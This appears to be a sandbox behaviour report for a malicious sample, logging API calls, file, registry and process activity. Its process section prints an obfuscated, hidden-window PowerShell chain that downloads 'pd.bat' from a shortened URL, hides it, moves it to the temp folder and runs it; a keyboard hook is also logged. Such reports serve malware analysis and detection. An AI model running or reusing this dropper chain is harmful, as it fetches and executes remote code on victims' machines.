
Other

Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_Read

Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_ReadWrite

Deactivated the activation context corresponding to the specified cookie

Initialized COM library for the current thread and set it in the concurrency mode

Install a new hook procedure (type: WH_KEYBOARD)

Install a new hook procedure (type: WH_MSGFILTER)

Obtained the contents of the specified variable from the environment block of the calling process

Obtained the identifier of the thread or process that created the specified window

Queried the activation context

Retrieved information on a specific string in the current activation context

Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

Network Operations: 1

Socket Activities

Retrieved the name of the network resource associated with a local device

Other Operations: 5

Others

Initialized a critical section object and set the spin count for the critical section

Obtained the current system date and time in in Coordinated Universal Time (UTC) format

Obtained the system metric or system configuration setting

Recorded system information

Retrieved the current local date and time

cmd.exe

File Operations: 22

Files Read

C:\Users\Administrator\Documents

Other

Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

Obtained a set of FAT file system attributes for a file or directory

Obtained the current directory for the current process

Retrieved the full path for the module

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell.*


Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell

Searched a directory for the name: C:\Users

Searched a directory for the name: C:\Users\Administrator

Searched a directory for the name: C:\Users\Administrator\Documents

Searched a directory for the name: C:\Users\Administrator\Documents\powershell.*

Searched a directory for the name: C:\Users\Administrator\Documents\powershell

Searched a directory for the name: C:\Windows\System32\Wbem\powershell.*

Searched a directory for the name: C:\Windows\System32\Wbem\powershell

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.*

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.COM

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

Searched a directory for the name: C:\Windows\powershell.*

Searched a directory for the name: C:\Windows\powershell

Searched a directory for the name: C:\Windows\system32\powershell.*

Searched a directory for the name: C:\Windows\system32\powershell

Registry Operations: 17

Registry Opened

HKCU\Software\Microsoft\Command Processor

HKCU\Software\Policies\Microsoft\Windows\System

HKLM\Software\Microsoft\Command Processor

Registry Read

HKCU\Software\Microsoft\Command Processor AutoRun

HKCU\Software\Microsoft\Command Processor CompletionChar

HKCU\Software\Microsoft\Command Processor DefaultColor

HKCU\Software\Microsoft\Command Processor DelayedExpansion

HKCU\Software\Microsoft\Command Processor DisableUNCCheck

HKCU\Software\Microsoft\Command Processor EnableExtensions

HKCU\Software\Microsoft\Command Processor PathCompletionChar

HKLM\Software\Microsoft\Command Processor AutoRun

HKLM\Software\Microsoft\Command Processor CompletionChar

HKLM\Software\Microsoft\Command Processor DefaultColor

HKLM\Software\Microsoft\Command Processor DelayedExpansion

HKLM\Software\Microsoft\Command Processor DisableUNCCheck

HKLM\Software\Microsoft\Command Processor EnableExtensions

HKLM\Software\Microsoft\Command Processor PathCompletionChar

Process Operations: 9

Process Created

Process Name Module

powershell -w 1 (new-ob`ject net.webclient).


c:\windows\system32\windowspowershell\v1.0\powershell.exe
('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')

powershell -w 1 start`-sle`ep 12; remove-item -path pd.bat -


c:\windows\system32\windowspowershell\v1.0\powershell.exe
force

c:\windows\system32\windowspowershell\v1.0\powershell.exe powershell -w 1 start`-sle`ep 1; attrib +s +h pd.bat

powershell -w 1 start`-sle`ep 3; move-item "pd.bat" -


c:\windows\system32\windowspowershell\v1.0\powershell.exe
destination "$e`nv:t`emp"

c:\windows\system32\windowspowershell\v1.0\powershell.exe powershell -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"

Process killed

Ended itself and all of its threads

Other

Enabled an application to supersede the top-level exception handler


Obtained the contents of the specified variable from the environment block of the calling process
Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

Other Operations: 1

Others

Retrieved information about a locale specified by a identifier

powershell.exe

Run-Time Dlls: 43
advapi32.dll

api-ms-win-appmodel-runtime-l1-1-0.dll

secur32.dll

system.data.dll

system.transactions.dll

shell32.dll

ntdll.dll

psapi.dll

rasapi32.dll

winhttp.dll

ws2_32.dll

microsoft.powershell.commands.utility.ni.dll

microsoft.powershell.commands.diagnostics.ni.dll

microsoft.powershell.security.ni.dll

microsoft.powershell.commands.management.ni.dll

microsoft.powershell.consolehost.ni.dll

microsoft.wsman.management.ni.dll

mscorlib.ni.dll

system.configuration.install.ni.dll

system.configuration.ni.dll

system.core.ni.dll

system.data.ni.dll

system.directoryservices.ni.dll

system.management.automation.ni.dll

system.management.ni.dll

system.transactions.ni.dll

system.xml.ni.dll

system.ni.dll

culture.dll

diasymreader.dll

mscorrc.dll

mscorjit.dll

mscorwks.dll

ole32.dll

oleaut32.dll

gdi32.dll

kernel32.dll

mscoree.dll

ntdll

shfolder.dll

shlwapi.dll

user32.dll
version.dll

File Operations: 155

Files Created

File Name Access Mode File Attributes

C:\Users\Administrator\Documents\pd.bat Write 100000

Files Opened

Access
File Name File Attributes
Mode

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch Read Normal

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config Read Normal

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config Read 100000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll 20000 10000000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config Read Normal

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml Read 8100000

C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll Read Normal

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Read 8000000

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Read Normal

C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Read Normal

C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Read Normal

C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll Read Normal

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll Read Normal

C:\Windows\assembly\NativeImages_v2.0.50727_32\index127.dat Read Normal

C:\Windows\assembly\pubpol17.dat Read Normal

C:\Windows\system32\l_intl.nls Read Normal

Read
CONOUT$ & Normal
Write
Files Deleted

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2540.4059218

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2548.4059203

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2804.4059203

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X43D78XIIKCRAJNR9GZN.temp

C:\Users\Administrator\Documents\pd.bat

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2540.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2548.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2804.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2540.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2548.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2804.4059203

Files Modified

Source File Destination File/Write Written

C:\Users\Administrator\Documents\pd.bat, attribute: Archive

Files Read

C:\.

C:\

C:\ProgramData\Oracle\Java\javapath

C:\Users

C:\Users\.

C:\Users\Administrator

C:\Users\Administrator\.

C:\Users\Administrator\Documents

C:\Users\Administrator\Documents\.

C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

C:\Users\Administrator\Documents\WindowsPowerShell\profile.ps1

C:\Users\Administrator\Documents\pd.bat

C:\Windows\Microsoft.NET\Framework\

C:\Windows\Microsoft.NET\Framework\v2.0.50727

C:\Windows\Microsoft.NET\Framework\v2.0.50727\

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll

C:\Windows\SysWOW64\WindowsPowerShell\v1.0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll

C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll

C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll

C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll

C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll

C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll

C:\Windows\system32

C:\Windows\system32\attrib.exe

pd.bat

Memory Mapped Files

Opened a named file-mapping object

Other

Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

Obtained a bitmask representing the currently available disk drives

Obtained a set of FAT file system attributes for a file or directory

Obtained information about the file system and volume associated with the root directory

Obtained path of the folder from its CLSID

Obtained the current directory for the current process

Obtained the path of the Windows system directory

Retrieved the full path for the module

Retrieved the path of the Windows directory

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.BAT

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.CMD

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.COM

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.EXE

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JS

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JSE

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.MSC

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBE

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBS

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSF

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSH

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.ps1

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psd1

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psm1

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib

Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat

Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat\*

Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*


Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI

Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI

Searched a directory for the name: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI

Searched a directory for the name: C:\Windows\system32\attrib.COM

Searched a directory for the name: C:\Windows\system32\attrib.EXE

Searched a directory for the name: C:\Windows\system32\attrib.ps1

Searched a directory for the name: C:\Windows\system32\attrib.psd1

Searched a directory for the name: C:\Windows\system32\attrib.psm1

Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe

Registry Operations: 534

Registry Created

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default

Registry Opened

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server

HKCU\Control Panel\International

HKCU\Environment

HKCU\Software\Microsoft\.NETFramework

HKCU\Software\Microsoft\Fusion

HKCU\Software\Microsoft\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

HKCU\Software\Microsoft\Installer\Assemblies\Global

HKLM\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

HKLM\SOFTWARE\Classes\Installer\Assemblies\Global

HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA

HKLM\SOFTWARE\Microsoft\Fusion

HKLM\SOFTWARE\Microsoft\PowerShell

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-
500\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-
500\Installer\Assemblies\Global
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN

HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance

HKLM\SYSTEM\CurrentControlSet\Services\EventLog

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell

HKLM\Software\Microsoft\.NETFramework

HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch

HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000

HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll

HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets

HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet

HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet

HKLM\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy

HKLM\Software\Microsoft\Fusion

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\20fe3c1a\56aa3966

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2b1373f4\4f4f14cc

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e571dbb\41bddfc6

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06
